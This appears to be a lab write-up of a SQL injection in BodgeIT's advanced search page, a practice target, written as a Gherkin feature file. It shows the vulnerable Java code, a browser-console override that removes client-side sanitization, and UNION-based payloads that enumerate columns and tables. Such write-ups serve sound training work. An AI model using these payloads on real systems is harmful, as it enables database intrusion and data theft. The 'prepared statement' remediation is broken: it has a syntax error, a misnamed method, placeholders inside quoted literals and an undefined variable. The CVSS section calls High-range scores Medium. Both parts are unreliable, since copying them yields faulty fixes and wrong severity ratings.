## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/advanced.jsp - query (parameter)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection') -base-
      https://cwe.mitre.org/data/definitions/89.html
    CWE-0943: Improper Neutralization of Special Elements in Data Query
    Logic -class-
      https://cwe.mitre.org/data/definitions/943.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-066: SQL Injection -standard-
      http://capec.mitre.org/data/definitions/66.html
    CAPEC-248: Command Injection
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.172: https://fluidattacks.com/web/es/rules/172/
  Goal:
    Inject SQL query into search parameter
  Recommendation:
    Use prepared statements

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/
    Then I can login and buy products as my own user

  Scenario: Static detection
  No input validation server-side
    When I look at the code at "thebodgeitstore/search/AdvancedSearch.java"
    """
    ...
    169 Statement stmt = this.connection.createStatement();
    170 ResultSet rs = null;
    171
    172 String sql = "SELECT PRODUCT, DESC, TYPE, TYPEID, PRICE " +
    173 "FROM PRODUCTS AS a JOIN PRODUCTTYPES AS b " +
    174 "ON a.TYPEID = b.TYPEID " +
    175 "WHERE PRODUCT LIKE '%{PRODUCT}%' AND " +
    176 "DESC LIKE '%{DESC}%' AND PRICE LIKE '%{PRICE}%' " +
    177 "AND TYPE LIKE '%{TYPE}%'";
    178 this.debugOutput.add("SQL Statement Before:".concat(sql));
    179
    180 for(String key : this.parameters.keySet()){
    181 String find = "\\{".concat(key.toUpperCase()).concat("\\}");
    182 sql = sql.replaceAll(find, this.parameters.get(key));
    183 }
    184 sql = sql.replaceAll("%\\{[^\\}]+\\}", "");
    185 this.debugOutput.add("SQL Statement After:".concat(sql));
    186 rs = stmt.executeQuery(sql);
    ...
    """
    Then I see it inserts user input directly into the SQL query

  Scenario: Dynamic detection
  Disabling client side validation
    Given I view the page source
    And find a script that sanitizes and encrypts input before submitting
    """
    69  <SCRIPT>
    70  loadfile('./js/encryption.js');
    71
    72  var key = "1921a480-5224-44";
    73
    74  function validateForm(form){
    75  var query = document.getElementById('query');
    76  var q = document.getElementById('q');
    77  var val = encryptForm(key, form);
    78  if(val){
    79  q.value = val;
    80  query.submit();
    81  }
    82  return false;
    83  }
    84
    85  function encryptForm(key, form){
    86  var params = form_to_params(form).replace(/</g, '&lt;').replace(/>/g, '&
    gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39');
    87  if(params.length > 0)
    88  return Aes.Ctr.encrypt(params, key, 128);
    89  return false;
    90  }
    91  </SCRIPT>
    """
    Then I open the browser console and replace the encryptForm function
    And make it not sanitize my input anymore
    """
    encryptForm = function(key, form){
    var params = form_to_params(form);
    if(params.length > 0)
    return Aes.Ctr.encrypt(params, key, 128);
    return false;
    }
    """
    Then I submit a "'" in the Products field
    And get an error response
    """
    System error.
    """
    Then I know there's probably a SQL Injection vulnerability

  Scenario: Exploitation
  Exfiltrate sensitive data via SQLi
    Given I send a Union query to check how many columns are in the original
    """
    a' UNION SELECT 1, 2, 3, 4, 5 FROM INFORMATION_SCHEMA.SYSTEM_TABLES; --
    """
    Then I get a response table with the reflected columns (evidence)[cols.png]
    Then I send a query to extract the names of the tables in the database
    """
    a' UNION SELECT table_name, 2, 3, 4, 5 FROM INFORMATION_SCHEMA.SYSTEM_TABLES
    ; --
    """
    Then I get returned a table with all the tables (evidence)[tables.png]
    Then I can continue extracting whatever data I want

  Scenario: Remediation
  Using prepared statements
    Given I patch the code as follows
    """
    ...
    169 Statement stmt = this.connection.preparedStatement("SELECT PRODUCT, DESC
    , TYPE, TYPEID, PRICE " +
    170 "FROM PRODUCTS AS a JOIN PRODUCTTYPES AS b " +
    171 "ON a.TYPEID = b.TYPEID " +
    172 "WHERE PRODUCT LIKE '%?%' AND " +
    173 "DESC LIKE '%?%' AND PRICE LIKE '%?%' " +
    174 "AND TYPE LIKE '%?%'");
    175 ResultSet rs = null;
    176
    177 String sql = ;
    178 this.debugOutput.add("SQL Statement Before:".concat(sql));
    179
    180 for(int i=1; i <= this.parameters.keySet().length; i++){
    181 stmt.setString(i, this.parameters.get(key))
    182 }
    183 this.debugOutput.add("SQL Statement After:".concat(sql));
    184 rs = stmt.executeQuery(sql);
    ...
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.1/10 (Medium) - AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-16
